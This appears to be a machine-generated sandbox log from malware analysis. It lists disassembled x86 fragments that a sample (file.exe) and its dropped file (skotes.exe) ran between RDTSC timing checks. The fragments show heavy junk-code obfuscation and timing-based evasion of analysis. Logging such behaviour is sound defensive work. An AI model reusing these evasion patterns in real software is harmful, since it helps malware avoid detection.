Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E02C9 second address: 54E0317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F368h 0x00000009 sub ah, 00000008h 0x0000000c jmp 00007F5E8080F35Bh 0x00000011 popfd 0x00000012 jmp 00007F5E8080F368h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0317 second address: 54E031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E031B second address: 54E0338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548006B second address: 548006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548006F second address: 5480075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480075 second address: 548007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548007B second address: 548007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0712 second address: 54E0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0716 second address: 54E071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E071C second address: 54E07C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBAEh 0x00000011 jmp 00007F5E810FCBB5h 0x00000016 popfd 0x00000017 pushad 0x00000018 push eax 0x00000019 pop edi 0x0000001a push esi 0x0000001b pop edi 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dl, 2Bh 0x00000022 jmp 00007F5E810FCBAEh 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5E810FCBAEh 0x00000030 sbb esi, 33AAEDA8h 0x00000036 jmp 00007F5E810FCBABh 0x0000003b popfd 0x0000003c mov cx, CC9Fh 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 pushad 0x00000044 mov ecx, 7483B097h 0x00000049 call 00007F5E810FCBACh 0x0000004e mov bl, cl 0x00000050 pop edx 0x00000051 popad 0x00000052 push dword ptr [ebp+0Ch] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov di, 03AAh 0x0000005c jmp 00007F5E810FCBABh 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E07C5 second address: 54E07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F35Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E07F4 second address: 54E0814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 51FC3CD3h 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0814 second address: 54E0846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007F5E8080F35Bh 0x0000000d sub si, 4BBEh 0x00000012 jmp 00007F5E8080F369h 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0914 second address: 54E0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5E810FCBACh 0x0000000c add eax, 1AB45568h 0x00000012 jmp 00007F5E810FCBABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0941 second address: 54E0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0945 second address: 54E0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0960 second address: 54E0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0966 second address: 54E096A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B994 second address: D0B998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490201 second address: 5490207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490207 second address: 549020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549020B second address: 5490239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5E810FCBB4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E810FCBAAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490239 second address: 549023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549023D second address: 5490243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490243 second address: 54902E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5E8080F360h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F5E8080F360h 0x00000017 call 00007F5E8080F359h 0x0000001c jmp 00007F5E8080F360h 0x00000021 push eax 0x00000022 pushad 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F5E8080F365h 0x00000033 xor cl, FFFFFFB6h 0x00000036 jmp 00007F5E8080F361h 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5E8080F363h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902E1 second address: 54902E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902E7 second address: 54902EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902EB second address: 5490311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push edi 0x00000011 mov dx, cx 0x00000014 pop ecx 0x00000015 mov bx, 1902h 0x00000019 popad 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490311 second address: 5490326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F360h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490326 second address: 549032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549032C second address: 5490353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5E8080F359h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F364h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490353 second address: 5490359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490359 second address: 549035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549035D second address: 54903BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5E810FCBB6h 0x00000010 sub ch, 00000058h 0x00000013 jmp 00007F5E810FCBABh 0x00000018 popfd 0x00000019 push ecx 0x0000001a mov bl, 70h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 movzx ecx, bx 0x00000026 movsx edx, cx 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c pushad 0x0000002d mov cx, di 0x00000030 push ebx 0x00000031 mov edx, esi 0x00000033 pop esi 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5E810FCBACh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903BD second address: 54903C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903C3 second address: 54903C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903C9 second address: 54903CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903CD second address: 54903FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5E810FCBB2h 0x00000010 sub ax, 5C78h 0x00000015 jmp 00007F5E810FCBABh 0x0000001a popfd 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903FE second address: 5490423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F367h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490423 second address: 54904DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov esi, 70DAD113h 0x00000010 jmp 00007F5E810FCBB8h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5E810FCBABh 0x0000001c nop 0x0000001d jmp 00007F5E810FCBB6h 0x00000022 sub esp, 1Ch 0x00000025 pushad 0x00000026 mov esi, 6CFF230Dh 0x0000002b popad 0x0000002c push esi 0x0000002d jmp 00007F5E810FCBB4h 0x00000032 mov dword ptr [esp], ebx 0x00000035 pushad 0x00000036 call 00007F5E810FCBAEh 0x0000003b pushfd 0x0000003c jmp 00007F5E810FCBB2h 0x00000041 sbb cx, 4AB8h 0x00000046 jmp 00007F5E810FCBABh 0x0000004b popfd 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f mov eax, edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54904DD second address: 5490535 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E8080F35Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebp 0x0000000c jmp 00007F5E8080F364h 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx ebx, cx 0x0000001a pushfd 0x0000001b jmp 00007F5E8080F366h 0x00000020 adc cx, A6A8h 0x00000025 jmp 00007F5E8080F35Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490535 second address: 5490580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 pushfd 0x00000011 jmp 00007F5E810FCBB4h 0x00000016 xor si, 3B68h 0x0000001b jmp 00007F5E810FCBABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490580 second address: 54905A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905A4 second address: 54905AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905AA second address: 5490616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ax, 2BC3h 0x0000000f pushfd 0x00000010 jmp 00007F5E8080F368h 0x00000015 add ax, 4288h 0x0000001a jmp 00007F5E8080F35Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [76FBB370h] 0x00000026 pushad 0x00000027 mov di, cx 0x0000002a jmp 00007F5E8080F360h 0x0000002f popad 0x00000030 xor dword ptr [ebp-08h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490616 second address: 549061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549061D second address: 549067E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007F5E8080F361h 0x00000010 nop 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 pushad 0x00000016 mov bx, 809Ah 0x0000001a mov ax, dx 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F5E8080F35Ch 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5E8080F367h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549067E second address: 5490696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490696 second address: 549074C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e jmp 00007F5E8080F366h 0x00000013 mov dword ptr fs:[00000000h], eax 0x00000019 pushad 0x0000001a call 00007F5E8080F35Eh 0x0000001f pop ebx 0x00000020 mov esi, 0FC8310Dh 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5E8080F366h 0x00000030 adc ch, 00000058h 0x00000033 jmp 00007F5E8080F35Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F5E8080F368h 0x0000003f add ecx, 554770B8h 0x00000045 jmp 00007F5E8080F35Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+10h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F5E8080F365h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549074C second address: 5490790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F5E810FCBAEh 0x00000010 jne 00007F5EF2B2C159h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5E810FCBB7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490790 second address: 54908A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F5E8080F367h 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F5E8080F364h 0x0000001a or ax, 7498h 0x0000001f jmp 00007F5E8080F35Bh 0x00000024 popfd 0x00000025 movzx ecx, bx 0x00000028 popad 0x00000029 mov ebx, dword ptr [esi] 0x0000002b jmp 00007F5E8080F35Bh 0x00000030 mov dword ptr [ebp-24h], ebx 0x00000033 jmp 00007F5E8080F366h 0x00000038 test ebx, ebx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F5E8080F35Eh 0x00000041 jmp 00007F5E8080F365h 0x00000046 popfd 0x00000047 jmp 00007F5E8080F360h 0x0000004c popad 0x0000004d je 00007F5EF223E780h 0x00000053 pushad 0x00000054 jmp 00007F5E8080F35Eh 0x00000059 pushfd 0x0000005a jmp 00007F5E8080F362h 0x0000005f sub eax, 12443E18h 0x00000065 jmp 00007F5E8080F35Bh 0x0000006a popfd 0x0000006b popad 0x0000006c cmp ebx, FFFFFFFFh 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 call 00007F5E8080F35Bh 0x00000077 pop esi 0x00000078 movsx edx, cx 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54908A4 second address: 5490201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5EF2B2BF6Eh 0x0000000e jne 00007F5E810FCBC9h 0x00000010 xor ecx, ecx 0x00000012 mov dword ptr [esi], ecx 0x00000014 mov dword ptr [esi+04h], ecx 0x00000017 mov dword ptr [esi+08h], ecx 0x0000001a mov dword ptr [esi+0Ch], ecx 0x0000001d mov dword ptr [esi+10h], ecx 0x00000020 mov dword ptr [esi+14h], ecx 0x00000023 mov ecx, dword ptr [ebp-10h] 0x00000026 mov dword ptr fs:[00000000h], ecx 0x0000002d pop ecx 0x0000002e pop edi 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 mov esp, ebp 0x00000033 pop ebp 0x00000034 retn 0004h 0x00000037 nop 0x00000038 pop ebp 0x00000039 ret 0x0000003a add esi, 18h 0x0000003d pop ecx 0x0000003e cmp esi, 00B556A8h 0x00000044 jne 00007F5E810FCB90h 0x00000046 push esi 0x00000047 call 00007F5E810FD413h 0x0000004c push ebp 0x0000004d mov ebp, esp 0x0000004f push dword ptr [ebp+08h] 0x00000052 call 00007F5E85A7FDD2h 0x00000057 mov edi, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F5E810FCBB5h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480CE4 second address: 5480D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F35Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480D02 second address: 5480D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 3378EF second address: 3378F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 3378F5 second address: 337902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5E810FCBA6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337902 second address: 337906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337906 second address: 337923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5E810FCBAEh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337923 second address: 337929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 326A6D second address: 326A72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 326A72 second address: 326A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5E8080F356h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CDE second address: 336CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CE2 second address: 336CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E8080F356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CEE second address: 336D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007F5E810FCBA6h 0x0000000b jmp 00007F5E810FCBABh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jnp 00007F5E810FCBA6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336D13 second address: 336D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F35Eh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336ED2 second address: 336ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AC97 second address: 33AC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AC9F second address: 33ACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33ACA5 second address: 33ACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E8080F368h 0x0000000d pushad 0x0000000e js 00007F5E8080F356h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33ACCE second address: 33AD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1CD0h], esi 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D200Ch] 0x00000015 mov ch, dh 0x00000017 push C92914E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F5E810FCBB1h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AEC6 second address: 33AECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
